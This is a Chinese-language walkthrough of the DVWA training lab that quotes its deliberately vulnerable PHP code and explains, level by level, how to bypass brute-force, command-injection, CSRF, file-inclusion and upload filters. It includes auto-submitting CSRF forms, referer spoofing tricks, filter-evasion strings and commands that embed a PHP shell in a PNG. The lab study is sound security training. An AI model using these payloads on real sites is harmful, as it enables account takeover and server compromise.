Brute force
low级别
暴力破解,根据自己的字典爆破或者进行信息搜集之后进行脚本的编写
分析源码:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass ); //进行md5加密
// Check the database
//查询语句
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
//mysqli_query()函数,第一个参数为数据库连接后的返回值,第二个为查询语句
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysqli_num_rows()函数,返回查询的结果数量
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
// mysqli_fetch_assoc()函数,将查询结果转化为关系数组
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
$html .= "<p>Welcome to the password protected area {$user}</p>";
$html .= "<img src=\"{$avatar}\" />";
}
else {
// Login failed
$html .= "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
其中不安全因素:
- GET方式的登录方式不安全,一般选用POST登录的方法
- username和password的值都没有进行过滤操作
同样因为有sql查询错误的报错函数,所以可以进行SQL注入
medium级别
这个级别比low级别多了一个函数mysqli_real_escape_string
将username
和password
中的特殊字符如' " \
进行了转义,隔绝了大部分SQL注入的可能性
同样可以通过burp暴力破解,只是因为有一个sleep()函数,破解时间将会延长
HIgh
在登录的时候加入了token的检验
通过burp的音叉模式来爆破token值
impossible
不知道了
Command Injection
low
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
$html .= "<pre>{$cmd}</pre>";
}
?>
将$_REQUEST得到的ip值没有过滤就传入了shell_exec()
函数中
通过管道符可以命令执行
;
|
&
&&
||
medium级别
和low级别的区别是设置了黑名单
// Set blacklist
$substitutions = array(
'&&' => '',
';' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
可以发现过滤了管道符&& ;
可以利用其他管道符绕过
high
相比于medium级别,黑名单数量增多,并对ip的传值进行了过滤
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = trim($_REQUEST[ 'ip' ]);
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
trim()函数:
去除两边的字符,默认是空格
似乎是过滤掉了所有的敏感字符,但是有个漏洞
'| ' => ''
在这个黑名单中管道符|
后面有一个空格,我们不加空格就可以绕过了
impossible级别
// Split the IP into 4 octects
$octet = explode( ".", $target );
// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
这样之后的代码只能说还是很安全了,将ip传入的值通过.
分开,分别判断是否是数字,如果都是数字类型,就把他们重组
CSRF
low
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
$html .= "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
$html .= "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
很明显,GET方式传入的password_new
password_conf
并没有经过过滤
获取密码,确认密码,并验证是否相同
- 法一:构造
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change
连接让用户直接访问 - 法二:将构造的长连接隐藏缩短,通过在线工具短网址生成工具,诱使用户点击
- 法三:
//结合XSS进行篡改密码
//编写一个xss.html
<html>
<head>
<title>
XSS&csrf
</title>
</head>
<body>
<script src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change"></script>
</body>
</html>
//当用户访问了llll/xss.html这个连接的时候,可以成功篡改
- 法四:可以通过
img
iframe
标签进行xss与csrf结合 如果是iframe
标签的时候,记得加上style="display:none"能够更好的隐藏html
medium
这个级别多了一个referer头
的检验
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )
构造html表单
<html>
<head>
<meta charset="utf-8">
<title>csrf</title>
</head>
<body>
<form method="get" id="crsf" action="http://127.0.0.1/dvwa/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="222">
<input type="hidden" name="password_conf" value="222">
<input type="hidden" name="Change" value="Change">
</form>
<script> document.forms["crsf"].submit(); </script>
</body>
</html>
//可以通过javascript代码当访问的时候自动提交表单
- 1.目录混淆referer头
http://127.0.0.1/dvwa/vulnerabilities/csrf/csrf.html
- 2.文件名混淆referer头
http://127.0.01/dvwa/vulnerabilities/csrf/127.0.0.1.html
- 3.?拼接混淆referer头
http://127.0.0.1/dvwa/vulnerabilities/csrf/csrf.html?127.0.0.1
file include
medium
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
//可以通过嵌套双写绕过
hhttps://ttps://
high
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
可以直接file伪协议绕过了
file upload
high级别:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
这一关会判断文件的大小与是否是图片
我们可以上传图片马绕过:
linux:
# 将 shell.php 内容追加到 pic.png
cat shell.php >> pic.png
# png + php 合成 png 图马
cat pic.png shell.php >> shell.png
# 直接 echo 追加
echo '<?php phpinfo();?>' >> pic.png
windows:
copy pic.png/b+shell.php/a shell.png